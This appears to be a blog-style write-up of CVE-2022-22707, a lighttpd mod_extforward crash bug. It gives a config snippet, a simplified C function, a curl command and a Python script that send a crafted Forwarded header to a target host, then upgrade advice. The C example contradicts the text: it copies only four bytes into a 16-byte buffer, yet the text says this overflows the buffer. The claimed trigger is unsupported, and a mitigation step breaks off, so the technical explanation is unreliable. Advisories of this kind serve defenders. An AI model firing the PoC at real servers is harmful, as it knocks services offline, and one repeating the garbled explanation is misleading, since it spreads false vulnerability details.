CVE-2022-22707 - How a Rare Lighttpd Configuration Can Crash Your Server (with Code & PoC)

Lighttpd is a popular web server, known for being lightweight and fast. However, in versions 1.4.46 through 1.4.63, an issue was discovered in the mod_extforward module that could bring your server down—if you have a special kind of configuration. Let’s break down what CVE-2022-22707 is, why it matters, how it works, and how an attacker can trigger it.

What is CVE-2022-22707?

*CVE-2022-22707* is a stack-based buffer overflow in the mod_extforward plugin for Lighttpd, specifically in the function that parses the Forwarded HTTP header. Under certain *non-default* configurations, this bug could be remotely triggered to crash Lighttpd—a classic Denial of Service (DoS) scenario.

Why Only Non-default Configurations?

By default, Lighttpd does not deeply inspect the Forwarded header. You must explicitly set up mod_extforward with extforward.headers to include "Forwarded" for this bug to even be exposed.

Example non-default snippet in lighttpd.conf

server.modules += ( "mod_extforward" )
extforward.headers = ("forwarded")

Let’s look at a stripped-down version of how the vulnerable function works in C

// This is a simplified example. Actual source is more complex.
int parse_forwarded(const char *value) {
    char buf[16];

    if (parse_number(value) == -1) {
        // -1 is xFFFFFFFF (on 32-bit), which can overflow the buffer
        memcpy(buf, &value, sizeof(int)); // Oops, could be writing more than needed!
        // ...crash could occur
    }
}

What happens here is that the function expects certain header parts to fit in a small buffer, but a numeric value of -1 (represented as xFFFFFFFF on 32-bit) is parsed instead. This causes a *buffer overflow*—data smashing into the stack, likely to crash the process.

On 64-bit systems, the overflow is less likely to corrupt memory due to larger stack frames, but on 32-bit systems it's very possible.

Proof of Concept (PoC)

Suppose you have Lighttpd running with a vulnerable config. An attacker can send a header like this in their HTTP request:

Forwarded: for=-1

You can test with curl

curl -H "Forwarded: for=-1" http://your-lighttpd-host/

If you monitor the server logs or process, Lighttpd may crash right away!

For automated testing, here is a minimal exploit in Python

import socket

HOST = 'victim.example.com'
PORT = 80

payload = (
    "GET / HTTP/1.1\r\n"
    "Host: {}\r\n"
    "Forwarded: for=-1\r\n"
    "Connection: close\r\n"
    "\r\n"
).format(HOST)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(payload.encode())
    print(s.recv(4096).decode(errors="ignore"))

Upgrade to Lighttpd 1.4.64 or later, which fixes this bug.

- If you can’t upgrade, *and you don’t strictly need mod_extforward with the Forwarded header*, remove or restrict this config:

References & More Reading

- Original Security Advisory
- Lighttpd Upstream Patch
- Lighttpd mod_extforward Documentation
- Exploit Details on Packet Storm

TL;DR

If you’re running Lighttpd and have enabled the Forwarded header in mod_extforward, upgrade now! This obscure bug can let anyone crash your daemon remotely with a single line of code—or even a curl command. The effect is worse on 32-bit servers, but everyone should patch or reconfigure to be safe.

Timeline

Published on: 01/06/2022 06:15:00 UTC
Last modified on: 01/13/2022 20:52:00 UTC